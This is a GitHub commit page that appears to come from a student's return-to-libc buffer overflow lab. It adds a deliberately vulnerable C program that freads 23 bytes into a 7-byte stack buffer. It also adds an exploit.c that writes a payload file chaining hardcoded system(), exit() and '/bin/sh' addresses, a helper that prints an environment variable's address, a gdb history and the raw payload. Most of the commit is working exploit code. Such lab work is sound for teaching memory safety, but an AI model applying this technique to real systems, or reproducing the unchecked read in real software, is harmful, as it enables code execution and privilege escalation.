Skip to content

Commit 6c0307b

Browse files
socket-varsocket-var
committed
final push
1 parent cab7354 commit 6c0307b

File tree

9 files changed

+72
-0
lines changed

9 files changed

+72
-0
lines changed

.gdb_history

Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
run
2+
b main
3+
r
4+
p system
5+
p exit
6+
x/s 0xbffffe16
7+
run
8+
run
9+
run
10+
b main
11+
r
12+
p systen
13+
p system
14+
p exit
15+
r
16+
r
17+
r
18+
run
19+
b main
20+
run
21+
run
22+
run

badfile

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
AAAAAAAAAAAAAAAAAAA�MڷЉٷ���

core

640 KB
Binary file not shown.

exploit

7.3 KB
Binary file not shown.

exploit.c

Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
#include <stdlib.h>
2+
#include <stdio.h>
3+
#include <string.h>
4+
int main(int argc, char **argv)
5+
{
6+
char buf[31];
7+
FILE *badfile;
8+
badfile = fopen("./badfile", "w");
9+
10+
strcpy(buf,"AAAAAAAAAAAAAAAAAAA"); // 19
11+
*(long *) &buf[27] = 0xbffffe0e ; // "/bin/sh"
12+
*(long *) &buf[19] = 0xb7da4da0 ; // system()
13+
*(long *) &buf[23] = 0xb7d989d0 ; // exit()
14+
fwrite(buf, sizeof(buf), 1, badfile);
15+
fclose(badfile);
16+
}
17+
18+

getaddr

7.21 KB
Binary file not shown.

getaddr.c

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,6 @@
1+
int main() {
2+
char *shell = getenv("MYSHELL");
3+
if (shell)
4+
printf("%x\n", shell);
5+
return 0;
6+
}

vulnerable

7.3 KB
Binary file not shown.

vulnerable.c

Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,25 @@
1+
#include <stdlib.h>
2+
#include <stdio.h>
3+
4+
int bof(FILE *badfile)
5+
{
6+
char buffer[7];
7+
8+
fread(buffer, sizeof(char), 23, badfile);
9+
10+
return 1;
11+
}
12+
13+
int main(int argc, char **argv)
14+
{
15+
FILE *badfile;
16+
17+
badfile = fopen("badfile", "r");
18+
bof(badfile);
19+
20+
printf("Returned Properly\n");
21+
22+
fclose(badfile);
23+
return 1;
24+
}
25+

0 commit comments

Comments
 (0)